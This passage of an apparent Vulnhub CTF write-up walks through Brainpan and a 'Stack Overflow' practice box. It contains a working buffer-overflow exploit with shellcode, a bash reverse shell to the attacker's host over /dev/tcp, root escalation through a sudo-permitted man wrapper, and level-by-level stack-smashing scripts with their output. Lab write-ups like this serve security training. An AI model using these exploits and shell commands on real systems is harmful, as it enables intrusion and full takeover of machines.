“\xf4\xb9\x2b\xa2\xa4\x15\x84\x03\x14\xd6\x74\xec\x7e\xd9\xab”
“\x0c\x81\x33\xc4\xa7\x78\xd4\x2b\x9f\x83\x5f\xc4\xe2\x83\x8e”
“\x48\x6a\x65\xda\x60\x3a\x3e\x73\x18\x67\xb4\xe2\xe5\xbd\xb1”
“\x25\x6d\x32\x46\xeb\x86\x3f\x54\x9c\x66\x0a\x06\x0b\x78\xa0”
“\x2e\xd7\xeb\x2f\xae\x9e\x17\xf8\xf9\xf7\xe6\xf1\x6f\xea\x51”
“\xa8\x8d\xf7\x04\x93\x15\x2c\xf5\x1a\x94\xa1\x41\x39\x86\x7f”
“\x49\x05\xf2\x2f\x1c\xd3\xac\x89\xf6\x95\x06\x40\xa4\x7f\xce”
“\x15\x86\xbf\x88\x19\xc3\x49\x74\xab\xba\x0f\x8b\x04\x2b\x98”
“\xf4\x78\xcb\x67\x2f\x39\xfb\x2d\x6d\x68\x94\xeb\xe4\x28\xf9”
“\x0b\xd3\x6f\x04\x88\xd1\x0f\xf3\x90\x90\x0a\xbf\x16\x49\x67”
“\xd0\xf2\x6d\xd4\xd1\xd6”;

Code is now:

#!/usr/bin/python
import socket
server = ‘192.168.1.149’
##server = ‘192.168.1.123’
sport = 9999

pad = “\x41” *524
EIP = “\xf3\x12\x17\x31”
shellcode = (“\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1”
“\x52\x31\x5d\x17\x03\x5d\x17\x83\x7c\xc8\x0f\xc1\x82\x39\x4d”
“\x2a\x7a\xba\x32\xa2\x9f\x8b\x72\xd0\xd4\xbc\x42\x92\xb8\x30”
“\x28\xf6\x28\xc2\x5c\xdf\x5f\x63\xea\x39\x6e\x74\x47\x79\xf1”
“\xf6\x9a\xae\xd1\xc7\x54\xa3\x10\x0f\x88\x4e\x40\xd8\xc6\xfd”
“\x74\x6d\x92\x3d\xff\x3d\x32\x46\x1c\xf5\x35\x67\xb3\x8d\x6f”
“\xa7\x32\x41\x04\xee\x2c\x86\x21\xb8\xc7\x7c\xdd\x3b\x01\x4d”
“\x1e\x97\x6c\x61\xed\xe9\xa9\x46\x0e\x9c\xc3\xb4\xb3\xa7\x10”
“\xc6\x6f\x2d\x82\x60\xfb\x95\x6e\x90\x28\x43\xe5\x9e\x85\x07”
“\xa1\x82\x18\xcb\xda\xbf\x91\xea\x0c\x36\xe1\xc8\x88\x12\xb1”
“\x71\x89\xfe\x14\x8d\xc9\xa0\xc9\x2b\x82\x4d\x1d\x46\xc9\x19”
“\xd2\x6b\xf1\xd9\x7c\xfb\x82\xeb\x23\x57\x0c\x40\xab\x71\xcb”
“\xa7\x86\xc6\x43\x56\x29\x37\x4a\x9d\x7d\x67\xe4\x34\xfe\xec”
“\xf4\xb9\x2b\xa2\xa4\x15\x84\x03\x14\xd6\x74\xec\x7e\xd9\xab”
“\x0c\x81\x33\xc4\xa7\x78\xd4\x2b\x9f\x83\x5f\xc4\xe2\x83\x8e”
“\x48\x6a\x65\xda\x60\x3a\x3e\x73\x18\x67\xb4\xe2\xe5\xbd\xb1”
“\x25\x6d\x32\x46\xeb\x86\x3f\x54\x9c\x66\x0a\x06\x0b\x78\xa0”
“\x2e\xd7\xeb\x2f\xae\x9e\x17\xf8\xf9\xf7\xe6\xf1\x6f\xea\x51”
“\xa8\x8d\xf7\x04\x93\x15\x2c\xf5\x1a\x94\xa1\x41\x39\x86\x7f”
“\x49\x05\xf2\x2f\x1c\xd3\xac\x89\xf6\x95\x06\x40\xa4\x7f\xce”
“\x15\x86\xbf\x88\x19\xc3\x49\x74\xab\xba\x0f\x8b\x04\x2b\x98”
“\xf4\x78\xcb\x67\x2f\x39\xfb\x2d\x6d\x68\x94\xeb\xe4\x28\xf9”
“\x0b\xd3\x6f\x04\x88\xd1\x0f\xf3\x90\x90\x0a\xbf\x16\x49\x67”
“\xd0\xf2\x6d\xd4\xd1\xd6”)
NOP = “\x90” * 16
exploit = pad + EIP + NOP + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
s.recv(1024)
s.send(exploit)
s.close()

Setting a listenner on port 443:

nc -nvlp 4444

Then ran my exploit:

nc -lvnp 4444
listening on [any] 4444 …
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.149] 34588
CMD Version 1.4.1

Z:\home\puck>whoami
File not found.

Z:\home\puck>dir
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\home\puck

3/6/2013 3:23 PM <DIR> .
3/4/2013 11:49 AM <DIR> ..
3/6/2013 3:23 PM 513 checksrv.sh
3/4/2013 2:45 PM <DIR> web
1 file 513 bytes
3 directories 13,846,552,576 bytes free

ESCALATION:

Z:\home\puck>type checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep brainpan.exe | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi

Nothing really interesting there.

This machine is strange… Almost all folders are empty..
Trying to detect windows version:

ver

CMD Version 1.4.1

Even more strange:

Z:\home\puck>cd ..

Z:\home>cd ..

Z:\>dir /a
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\

3/4/2013 1:02 PM <DIR> bin
3/4/2013 11:19 AM <DIR> boot
8/28/2019 8:03 PM <DIR> etc
3/4/2013 11:49 AM <DIR> home
3/4/2013 11:18 AM 15,084,717 initrd.img
3/4/2013 11:18 AM 15,084,717 initrd.img.old
3/4/2013 1:04 PM <DIR> lib
3/4/2013 10:12 AM <DIR> lost+found
3/4/2013 10:12 AM <DIR> media
10/9/2012 9:59 AM <DIR> mnt
3/4/2013 10:13 AM <DIR> opt
3/7/2013 11:07 PM <DIR> root
8/28/2019 8:03 PM <DIR> run
3/4/2013 11:20 AM <DIR> sbin
6/11/2012 9:43 AM <DIR> selinux
3/4/2013 10:13 AM <DIR> srv
8/28/2019 8:04 PM <DIR> tmp
3/4/2013 10:13 AM <DIR> usr
8/28/2019 8:03 PM <DIR> var
2/25/2013 2:32 PM 5,180,432 vmlinuz
2/25/2013 2:32 PM 5,180,432 vmlinuz.old
4 files 40,530,298 bytes
17 directories 13,846,274,048 bytes free

So I am on a linux box….

Went to Z:/bin

And executed bash… it worked!

So on the target I ran:
bash -i >& /dev/tcp/192.168.1.123/6666 0>&1

And on kali:

nc -lnvp 6666

And I have now a bash shell…

nc -nvlp 6666
listening on [any] 6666 …
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.149] 35588
bash: no job control in this shell

A little bit of cleaning:

puck@brainpan:/bin$ python -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now let’s digg:

sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

For now it seems that I can only execute the file..

So let’s run linenum:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.10
DISTRIB_CODENAME=quantal
DISTRIB_DESCRIPTION=”Ubuntu 12.10″
NAME=”Ubuntu”
VERSION=”12.10, Quantal Quetzal”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu quantal (12.10)”
VERSION_ID=”12.10″

We can sudo without supplying a password!
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget

Checking exploitdb for Ubuntu 12.10
The only one available is for 64 bits platforms.. and here we have a 32 bits.

OK so let’s focus on that exe from anansi:

sudo /home/anansi/bin/anansi_util $(python -c “print ‘B’*3000”)
<ome/anansi/bin/anansi_util $(python -c “print ‘B’*3000”)
‘unknown’: unknown terminal type.

Hum.. doesn’t seem to be sensitive to buffer overflow…

Let’s go back to the menu…. We can enter a command

sudo /home/anansi/bin/anansi_util manual whoami
No manual entry for manual
WARNING: terminal is not fully functional
– (press RETURN)
WHOAMI(1) User Commands WHOAMI(1)

NAME
whoami – print effective userid

SYNOPSIS
whoami [OPTION]…

DESCRIPTION
Print the user name associated with the current effective user ID.
Same as id -un.

OK so it’s running man! And according to https://gtfobins.github.io/gtfobins/man/, man can launch a shell…. and here the command is running as root!

BINGO!

puck@brainpan:/bin$ sudo /home/anansi/bin/anansi_util manual man man
!/bin/sh
sudo /home/anansi/bin/anansi_util manual man man
No manual entry for manual
WARNING: terminal is not fully functional
– (press RETURN)
!/bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
#

cd /root
# ll
ll
total 40
drwx—— 5 root root 4096 Mar 7 2013 .
drwxr-xr-x 22 root root 4096 Mar 4 2013 ..
drwx—— 2 root root 4096 Mar 4 2013 .aptitude
-rw——- 1 root root 0 Mar 7 2013 .bash_history
-rw-r–r– 1 root root 3106 Jul 3 2012 .bashrc
-rw-r–r– 1 root root 564 Mar 7 2013 b.txt
drwx—— 2 root root 4096 Mar 4 2013 .cache
-rw——- 1 root root 39 Mar 5 2013 .lesshst
-rw-r–r– 1 root root 140 Jul 3 2012 .profile
-rw-r–r– 1 root root 74 Mar 5 2013 .selected_editor
drwx—— 2 root root 4096 Mar 4 2013 .ssh
# cat b.txt
cat b.txt
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

http://www.techorganic.com

Stack Overflow

A funny machine to practice Buffer Overflow… Downloaded from Vulnhub.

 

Hi hi hi.. Funny.. it’s a Kali box!!!!

So let’s start….

Level 1:

after login in I found an exe and its source

In the source code I found:
if(key == 0x42424242) {
execve(“/bin/sh”, 0, 0);

42 is B in HEX…

So trying to input some Bs:

level0@kali:~$ ./levelOne $(python -c “print ‘B’*34”)
Buf is: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Key is: 0x12004242
Sorry try again…
level0@kali:~$ ./levelOne $(python -c “print ‘B’*35”)
Buf is: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Key is: 0x00424242
Sorry try again…
level0@kali:~$ ./levelOne $(python -c “print ‘B’*36”)
Buf is: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Key is: 0x42424242
$ id
uid=1001(level1) gid=1000(level0) groups=1000(level0)

LEVEL2:

$ alias ll=”ls -al”
$ ll
total 56
drwx—— 2 level1 level1 4096 Jun 16 12:14 .
drwxr-xr-x 8 root root 4096 Jun 8 10:16 ..
-rw-r–r– 1 level1 level1 220 Feb 22 12:13 .bash_logout
-rw-r–r– 1 level1 level1 3391 Feb 22 12:13 .bashrc
-rw-r–r– 1 level1 level1 3526 Feb 22 12:13 .bashrc.original
-rw-r–r– 1 level1 level1 51 Feb 25 13:39 .gdbinit
-rw-r–r– 1 level1 level1 807 Feb 22 12:13 .profile
-rw——- 1 level1 level1 979 Feb 22 12:42 .viminfo
-rw-r–r– 1 level1 level1 161 Feb 22 12:17 .vimrc
-r–r—– 1 level1 level1 33 Feb 22 12:16 level1.txt
-rwsr-sr-x 1 level2 level2 15688 Jun 8 13:43 levelTwo
$ cat level1.txt
a1e7076bbd600f4dccbc38aabcb12897

The software LvelTwo take arguments:

$ bash
level1@kali:/home/level1$ ./levelTwo aaa
Hello aaa

And crashes at 32:

level1@kali:/home/level1$ ./levelTwo $(python -c “print ‘B’*32”)
Hello BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Segmentation fault

let’s find where it’s crashing then:

./pattern_create.rb -l 100

root@kali:~/boxes/stackoverflows# gdb levelTwo
GNU gdb (Debian 8.2.1-2+b1) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type “show copying” and “show warranty” for details.
This GDB was configured as “x86_64-linux-gnu”.
Type “show configuration” for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type “help”.
Type “apropos word” to search for commands related to “word”…
Reading symbols from levelTwo…(no debugging symbols found)…done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /root/boxes/stackoverflows/levelTwo Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Hello Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x41326241 in ?? ()

(gdb) info frame
Stack level 0, frame at 0xffffdd34:
eip = 0x41326241; saved eip = 0x62413362
called by frame at 0xffffdd38
Arglist at 0xffffdd2c, args:
Locals at 0xffffdd2c, Previous frame’s sp is 0xffffdd34
Saved registers:
eip at 0xffffdd30

/usr/bin/msf-pattern_offset -q 41326241
[*] Exact match at offset 36

Exploit:

level1@kali:/home/level1$ cat test.py
import struct
pad = “\x41” *36
EIP = struct.pack(“I”,0xffffdd34)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
print pad + EIP + NOP + shellcode

level1@kali:/home/level1$ ./levelTwo $(python test.py)
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1۰̀Sh/ttyh/dev��1�f�’�̀1�Ph//shh/bin��PS�ᙰ

$ id
uid=1002(level2) gid=1000(level0) groups=1000(level0)

cat level2.txt
c1a0794b6b8e4ad053e0263cfce223a4

LEVEL 3:

level2@kali:/home/level2$ ll
total 56
drwx—— 2 level2 level2 4096 Jun 16 12:15 .
drwxr-xr-x 8 root root 4096 Jun 8 10:16 ..
-rw-r–r– 1 level2 level2 220 Feb 22 12:13 .bash_logout
-rw-r–r– 1 level2 level2 3391 Feb 22 12:13 .bashrc
-rw-r–r– 1 level2 level2 3526 Feb 22 12:13 .bashrc.original
-rw-r–r– 1 level2 level2 29 Feb 22 12:18 .gdbinit
-rw-r–r– 1 level2 level2 807 Feb 22 12:13 .profile
-rw——- 1 level2 level2 895 Feb 22 12:48 .viminfo
-rw-r–r– 1 level2 level2 161 Feb 22 12:18 .vimrc
-r–r—– 1 level2 level2 33 Feb 22 12:18 level2.txt
-rwsr-sr-x 1 level3 level3 15596 Jun 8 13:44 levelThree

level2@kali:/home/level2$ file levelThree
levelThree: setuid, setgid ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6a53242578c17f973d1f37148b2cb2251c2103f6, not stripped

./levelThree $(python -c “print ‘B’*1000”)
Buf: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Segmentation fault

level2@kali:/home/level2$ /usr/bin/msf-pattern_create -l 1000
Rails Error: Unable to access log file. Please ensure that /home/level0/.msf4/logs/production.log exists and is writable (ie, make it writable for user and group: chmod 0664 /home/level0/.msf4/logs/production.log). The log level has been raised to WARN and the output directed to STDERR until the problem is fixed.
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Then run in GDB:
level2@kali:/home/level2$ gdb -q levelThree
Reading symbols from levelThree…(no debugging symbols found)…done.
warning: File “/home/level2/.gdbinit” auto-loading has been declined by your `auto-load safe-path’ set to “$debugdir:$datadir/auto-load”.
To enable execution of this file add
add-auto-load-safe-path /home/level2/.gdbinit
line to your configuration file “$HOME/.gdbinit”.
To completely disable this security protection add
set auto-load safe-path /
line to your configuration file “$HOME/.gdbinit”.
For more information about this security protection see the
“Auto-loading safe path” section in the GDB manual. E.g., run from the shell:
info “(gdb)Auto-loading safe path”
<3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /home/level2/levelThree Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Buf: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
(gdb) info frame
Stack level 0, frame at 0xffffd9b4:
eip = 0x6a413969; saved eip = 0x316a4130
called by frame at 0xffffd9b8
Arglist at 0xffffd9ac, args:
Locals at 0xffffd9ac, Previous frame’s sp is 0xffffd9b4
Saved registers:
eip at 0xffffd9b0

level2@kali:/home/level2$ /usr/bin/msf-pattern_offset -q 6a413969
Rails Error: Unable to access log file. Please ensure that /home/level0/.msf4/logs/production.log exists and is writable (ie, make it writable for user and group: chmod 0664 /home/level0/.msf4/logs/production.log). The log level has been raised to WARN and the output directed to STDERR until the problem is fixed.
[*] Exact match at offset 268

Creating exploit:

import struct
pad = “\x41” *268
EIP = struct.pack(“I”,0xffffd9b4)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
print pad + EIP + NOP + shellcode

level2@kali:/home/level2$ ./levelThree $(python test.py)
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1۰̀Sh/ttyh/dev��1�f�’�̀1�Ph//shh/bin��PS�ᙰ

$ id
uid=1003(level3) gid=1000(level0) groups=1000(level0)

cat level3.txt
c303c0eaeb5f1afcc300a5cecf541083

LEVEL4:

./levelFour ss
Buf: ss

./levelFour $(python -c “print ‘B’*1000”)
